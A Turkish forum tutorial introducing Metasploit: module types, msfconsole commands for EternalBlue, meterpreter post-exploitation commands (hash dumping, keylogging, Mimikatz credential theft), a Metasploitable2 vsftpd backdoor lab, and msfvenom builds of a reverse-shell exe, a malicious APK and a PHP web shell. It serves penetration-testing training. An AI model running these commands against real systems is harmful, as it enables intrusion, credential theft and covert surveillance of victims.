Siber Alem / Detail / 236 / Metasploit-framework-kullanimi-sifirdan-i-lk-exploit-e-baslangic-rehberi
technical_article_reader.sh
TECHNICAL PAPER / papers

Metasploit Framework Kullanımı: Sıfırdan İlk Exploit'e Başlangıç Rehberi

2026-07-21
2 min read (390 words)
1 views

Araç Rehberi • Exploit Çerçevesi

Metasploit Framework: Sıfırdan İlk Exploit'e

Metasploit, 2003'te HD Moore tarafından geliştirilen ve bugün Rapid7 tarafından yönetilen açık kaynaklı exploit çerçevesidir. 2000'den fazla exploit, yüzlerce payload ve otomatik post-exploitation modülüyle sektörün en kapsamlı sızma testi platformudur. Yalnızca izin verilen sistemlerde kullanılmalıdır.

1. Metasploit Mimarisi: Ne Neye Yarar?

ExploitHedef sistemdeki açığı tetikleyen kod
PayloadExploit sonrası çalışacak kod (shell, meterpreter)
AuxiliaryTarama, brute force, fuzzing modülleri
PostErişim sonrası veri toplama modülleri
EncoderPayload'ı şifreleyerek AV'dan kaçma
NopNOP slide için padding üreticileri

2. Temel msfconsole Komutları

msfconsole # Başlat
help # Komutları listele
search eternalblue # Exploit ara
use exploit/windows/smb/ms17_010_eternalblue # Seç
show options # Gerekli parametreler
set RHOSTS 192.168.1.100 # Hedef IP
set LHOST 192.168.1.50 # Dinleyici IP (sizin)
set PAYLOAD windows/x64/meterpreter/reverse_tcp # Payload
run # Çalıştır

sessions -l # Açık oturumlar
sessions -i 1 # 1. oturuma bağlan

3. Meterpreter: Post-Exploitation İsviçre Çakısı

Meterpreter, bellekte çalışan (disk yazısı bırakmayan), şifreli kanal üzerinden iletişim kuran gelişmiş payload'dır. Sistem üzerinde son derece geniş yetenekler sunar:

sysinfo # Sistem bilgisi (OS, hostname)
getuid # Mevcut kullanıcı
getsystem # Otomatik yetki yükseltme dener
hashdump # Windows şifre hash'lerini çek
screenshot # Ekran görüntüsü al
keyscan_start # Keylogger başlat
keyscan_dump # Kaydedilen tuşları al
upload /root/tool.exe C:\\Windows\\Temp # Dosya yükle
download C:\\Users\\target\\file.txt # Dosya indir
run post/multi/recon/local_exploit_suggester # LPE önerir
load kiwi # Mimikatz entegrasyonu
creds_all # Tüm kimlik bilgilerini çek

4. Lab Senaryosu: Metasploitable2'ye İlk Exploit

Metasploitable2 kasıtlı olarak zafiyetli yapılmış bir Linux imajıdır. VirtualBox'a kurup güvenle pratik yapabilirsiniz. Popüler hedef: vsftpd 2.3.4 backdoor.

# Nmap ile tespit
nmap -sV -p 21 192.168.1.200
# Sonuç: 21/tcp open ftp vsftpd 2.3.4

# Metasploit ile exploit
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.1.200
run
# [*] Command shell session 1 opened → Root shell!
id # uid=0(root) gid=0(root)

5. msfvenom: Özelleştirilmiş Payload Üretimi

# Windows reverse TCP payload (.exe)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o payload.exe

# Android APK payload
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -o malicious.apk

# PHP web shell (web server'a yüklenir)
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw -o shell.php

Makale Tartışmaları (1)

His0k4
USER
Rank: Script Kiddie
Posts: 6
Rep: 0
Joined: 2009-01
Rep Progress 0 / 500
2026-07-21 21:14:51 #1

Metasploit öğrenirken en büyük hatam her şeyi otomatik kullanmaktı. Arkasında ne döndüğünü anlamak için Wireshark ile paralel açıp trafiği izlemenizi öneririm. Meterpreter oturumu açıldıktan sonra 'load kiwi' ile Mimikatz entegrasyonunu da incelemenizi şiddetle tavsiye ederim.

Yorum Yapmak İçin Giriş Yapın

Bu makaleye yorum yazmak ve tartışmaya katılmak için giriş yapmalısınız.